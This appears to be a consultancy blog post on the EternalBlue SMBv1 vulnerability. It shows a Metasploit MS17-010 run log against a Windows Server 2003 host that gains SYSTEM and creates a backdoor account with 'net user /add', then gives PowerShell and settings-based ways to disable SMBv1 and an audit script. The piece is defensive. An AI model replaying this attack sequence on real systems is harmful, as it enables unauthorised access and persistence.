TL;DR


set-smbserverconfiguration -EnableSMB1Protocol $false

Everyone has heard about the EternalBlue exploit that ran wild in 2017.

This exploit was used to spread ransomware around the world, and it caused huge frustration, cost and outright panic in the workplace. Even popular TV shows like The Good Wife worked ransomware into their storylines. All this because a single SMBv1 vulnerability (MS17-010) was being leveraged to gain entry and encrypt files.

Not safe yet


So it's June 2018, and you would assume that people have patched and updated their computers and that we are safe now.

Unfortunately, our A-Team Protection team here at GTconsult still finds, on a daily basis, that the easiest and most abundant way in is the EternalBlue SMBv1 exploit.

A lot of our clients still have legacy Windows Server 2003 machines that cannot be retired because some line-of-business system cannot be upgraded or moved. In this case, we have a Windows Server 2003 3790 Service Pack 2 machine that the Metasploit MS17-010 scanner flags as vulnerable:

[+] 10.89.32.4:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2

msf auxiliary(admin/smb/ms17_010_command) > run

[*] 10.89.32.4:445 - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 10.89.32.4:445 - Filling barrel with fish... done
[*] 10.89.32.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.89.32.4:445 - [*] Preparing dynamite...
[*] 10.89.32.4:445 - Trying stick 1 (x64)...Miss
[*] 10.89.32.4:445 - [*] Trying stick 2 (x86)...Boom!
[*] 10.89.32.4:445 - [+] Successfully Leaked Transaction!
[*] 10.89.32.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.89.32.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.89.32.4:445 - Reading from CONNECTION struct at: 0x89a2bad8
[*] 10.89.32.4:445 - Built a write-what-where primitive...
[+] 10.89.32.4:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.89.32.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.89.32.4:445 - checking if the file is unlocked
[*] 10.89.32.4:445 - Getting the command output...
[*] 10.89.32.4:445 - Executing cleanup...
[+] 10.89.32.4:445 - Cleanup was successful
[+] 10.89.32.4:445 - Command completed successfuly!
[*] 10.89.32.4:445 - Output for "net user /add gtconsult SDFGE%YSDFsaf12":
And there you have it: the command ran as SYSTEM and created a local account called gtconsult on the server, so we now own the box. All because SMBv1 was not disabled, and from here we would most likely move laterally to other machines and pick up domain admin credentials.

So how do we stop this from happening?


The best thing to do is disable SMB v1 and here are a few methods on how to do that:

Method 1 – PowerShell (Windows 8 / Server 2012 and later; takes effect without a reboot)

set-smbserverconfiguration -EnableSMB1Protocol $false

Confirm it took by checking that EnableSMB1Protocol now reads False in the output of Get-SmbServerConfiguration. Windows 7 and Server 2008 R2 do not have this cmdlet; there you set the SMB1 DWORD under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters to 0 and reboot.



Method 2 – Windows Features

Open Windows Features and untick SMB 1.0/CIFS File Sharing Support (on Windows Server the same component is removed through Server Manager under Remove Roles and Features). Unlike Method 1, this removes the SMBv1 server and client components entirely and needs a reboot to take effect.
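Before you switch SMBv1 off, you want to know who is still using it, and afterwards you want to prove it is actually gone on both the server and the client side. The script below is an added example written for this post, not GTconsult's tooling or Microsoft's own guidance; it assumes Windows 8.1 / Server 2012 R2 or later with the SmbShare module, an elevated PowerShell 4 or later session, and that the optional component is named SMB1Protocol (the function and property names Get-Smb1State, Get-Smb1Session, Enable-Smb1Audit and Disable-Smb1 are mine).

```powershell
# Added example, not from the original post: audit, disable and verify SMBv1 on a
# supported Windows host. Assumes Windows 8.1 / Server 2012 R2 or later with the
# SmbShare module, run from an elevated PowerShell 4+ session. Windows Server 2003
# cannot run this (no SmbShare module, and it only speaks SMBv1).
#Requires -RunAsAdministrator

function Get-Smb1State {
    # Server side: does the file server still offer the SMB1 dialect?
    $server = Get-SmbServerConfiguration
    # Client side: the SMB1 redirector driver (mrxsmb10); Start=4 means disabled.
    $mrxsmb10 = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\mrxsmb10' -ErrorAction SilentlyContinue
    # Optional component behind "SMB 1.0/CIFS File Sharing Support" in Windows Features.
    $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        ServerSmb1Enabled = $server.EnableSMB1Protocol
        ClientSmb1Driver  = if (-not $mrxsmb10) { 'NotPresent' } elseif ($mrxsmb10.Start -eq 4) { 'Disabled' } else { 'Enabled' }
        FeatureState      = if ($feature) { [string]$feature.State } else { 'Unknown' }
    }
}

function Get-Smb1Session {
    # Sessions negotiated below dialect 2.0 are SMB1 clients. They will break when
    # SMB1 is switched off, so find and fix (or isolate) them first.
    Get-SmbSession -ErrorAction SilentlyContinue |
        Where-Object { [version]$_.Dialect -lt [version]'2.0' } |
        Select-Object ClientComputerName, ClientUserName, Dialect
}

function Enable-Smb1Audit {
    # Server 2016 / Windows 10 and later only: log every SMB1 connection as event 3000
    # in Microsoft-Windows-SMBServer/Audit. Useful on busy servers where Get-SmbSession
    # only shows a moment in time.
    $cfg = Get-SmbServerConfiguration
    if ($cfg.PSObject.Properties['AuditSmb1Access']) {
        Set-SmbServerConfiguration -AuditSmb1Access $true -Force
    } else {
        Write-Warning 'SMB1 access auditing is not available on this Windows version.'
    }
}

function Disable-Smb1 {
    param([switch]$RemoveFeature)
    # Server side: stop negotiating the SMB1 dialect. Takes effect without a reboot.
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    # Client side: drop the workstation service's dependency on the SMB1 redirector
    # and disable the driver, so this host cannot be talked down to SMB1 either.
    sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi | Out-Null
    sc.exe config mrxsmb10 start= disabled | Out-Null
    if ($RemoveFeature) {
        # Equivalent of unticking "SMB 1.0/CIFS File Sharing Support"; needs a reboot.
        Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
    }
}

# Usage: audit first, then disable once no SMB1-only clients remain.
Get-Smb1State | Format-List
$legacy = @(Get-Smb1Session)
if ($legacy.Count -gt 0) {
    Write-Warning 'These clients still negotiate SMB1; fix or isolate them before disabling:'
    $legacy | Format-Table -AutoSize
    Enable-Smb1Audit
} else {
    Disable-Smb1
    Get-Smb1State | Format-List   # ServerSmb1Enabled should now read False
}
```

The script deliberately disables SMB1 on both sides: Set-SmbServerConfiguration only stops the host from serving SMB1, while the sc.exe lines stop it from speaking SMB1 as a client to something else on the network. On Windows Server editions the -RemoveFeature switch can be swapped for Uninstall-WindowsFeature -Name FS-SMB1, which is the Server Manager equivalent of Method 2.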




Once SMBv1 is off, the server no longer negotiates that dialect and MS17-010 has nothing to talk to. One caveat: Windows Server 2003 only speaks SMBv1, so you cannot turn it off there without losing file sharing entirely, and the PowerShell cmdlet does not exist on it. For those boxes, install Microsoft's out-of-band MS17-010 update for Server 2003 (KB4012598) and block TCP 445 from everything that does not strictly need it until the machine can finally be retired. Happy working!

Jordan Govender
Designer. Musician. Part of GTconsult's A-Team. Enabling secure productivity daily!
